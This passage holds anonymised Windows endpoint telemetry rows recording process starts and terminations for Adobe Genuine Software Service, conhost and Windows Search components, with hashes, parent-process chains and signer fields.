00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:18.004102600+00:00,2021-06-25 00:57:53.257370300+00:00,28fe8fed-cae1-4d7d-aa0d-80e4980b3adb,computerpii_0a470890c60768167990033d701e7bd881398861,182262,False,10.7740.19041.1052,False,11540474045144190,,11540474045178538,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+997,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:17.957372400+00:00,1524,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_iqgykz 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:18.008125+00:00,2021-06-25 00:57:53.257520200+00:00,b56c91ed-0e43-49a9-af90-1cdcf6dc96ae,computerpii_0a470890c60768167990033d701e7bd881398861,182264,False,10.7740.19041.1052,False,11540474045136991,,11540474045178540,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+998,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:17.979872900+00:00,11116,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:17.957372400+00:00,1524,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_iqgykz 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:18.010599800+00:00,2021-06-25 00:57:53.257586500+00:00,803d006d-4232-4d47-af42-4bdfe693592d,computerpii_0a470890c60768167990033d701e7bd881398861,182265,False,10.7740.19041.1052,False,11540474045178540,,11540474045178541,2021-06-25 00:57:17.957372400+00:00,1524,2021-06-25 00:57:17.957372400+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,1524,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:28.804194500+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+999,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:57:18.368825400+00:00,14384,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe844_ Global\UsGthrCtrlFltPipeMssGthrPipe844 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:18.410980800+00:00,2021-06-25 00:57:53.257861600+00:00,25d1a9df-9c71-4cd1-ade0-3d8f2478f3e2,computerpii_0a470890c60768167990033d701e7bd881398861,182269,False,10.7740.19041.1052,False,11540474045144190,,11540474045178542,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1000,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:18.960022800+00:00,11236,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_laalda 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:18.997421400+00:00,2021-06-25 00:57:53.258079100+00:00,f0ec57de-2121-43a9-a87f-e1aad7f671c2,computerpii_0a470890c60768167990033d701e7bd881398861,182272,False,10.7740.19041.1052,False,11540474045136991,,11540474045178543,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,18560,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+1001,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:18.960864700+00:00,7968,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_phdvwo 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:18.997560100+00:00,2021-06-25 00:57:53.258155+00:00,1be5fe3b-796b-41d7-a360-8d7d60452d05,computerpii_0a470890c60768167990033d701e7bd881398861,182273,False,10.7740.19041.1052,False,11540474045136991,,11540474045178544,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+1002,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:18.968255+00:00,11268,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:18.960022800+00:00,11236,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_laalda 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:18.998404500+00:00,2021-06-25 00:57:53.258227400+00:00,d10c0b00-2ebd-42f0-9a30-e573c1610c12,computerpii_0a470890c60768167990033d701e7bd881398861,182274,False,10.7740.19041.1052,False,11540474045178543,,11540474045178546,2021-06-25 00:57:18.960022800+00:00,11236,2021-06-25 00:57:18.960022800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,11236,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:28.804194500+00:00,2020-09-22 19:30:00+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1003,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:18.968253400+00:00,8932,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:18.960864700+00:00,7968,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_phdvwo 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:18.998586800+00:00,2021-06-25 00:57:53.258298300+00:00,2856ad75-9124-464c-af66-cc6fda0cc25b,computerpii_0a470890c60768167990033d701e7bd881398861,182275,False,10.7740.19041.1052,False,11540474045178544,,11540474045178545,2021-06-25 00:57:18.960864700+00:00,7968,2021-06-25 00:57:18.960864700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,7968,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:28.804194500+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1004,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:19.198226200+00:00,12380,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_olcrob 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:19.238387400+00:00,2021-06-25 00:57:53.258639300+00:00,f848e73c-1f75-44a5-8c86-6c8bf8eab107,computerpii_0a470890c60768167990033d701e7bd881398861,182280,False,10.7740.19041.1052,False,11540474045136991,,11540474045178547,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,AGMService.exe,4496,256,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+1005,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:19.199831900+00:00,20096,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a20196"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a20196""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,323272,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:19.238723100+00:00,2021-06-25 00:57:53.258715400+00:00,a686754b-af8b-4be8-a923-4c5ff9642de8,computerpii_0a470890c60768167990033d701e7bd881398861,182281,False,10.7740.19041.1052,False,11540474045136991,,11540474045178548,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility
+1006,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:19.205720+00:00,9572,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:19.198226200+00:00,12380,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_olcrob 3",False,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:19.239412100+00:00,2021-06-25 00:57:53.258784300+00:00,80551357-4d8d-47e3-b19b-77950c11aa48,computerpii_0a470890c60768167990033d701e7bd881398861,182282,False,10.7740.19041.1052,False,11540474045178547,,11540474045178549,2021-06-25 00:57:19.198226200+00:00,12380,2021-06-25 00:57:19.198226200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,12380,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:57:19.222128200+00:00,2020-09-22 19:30:00+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 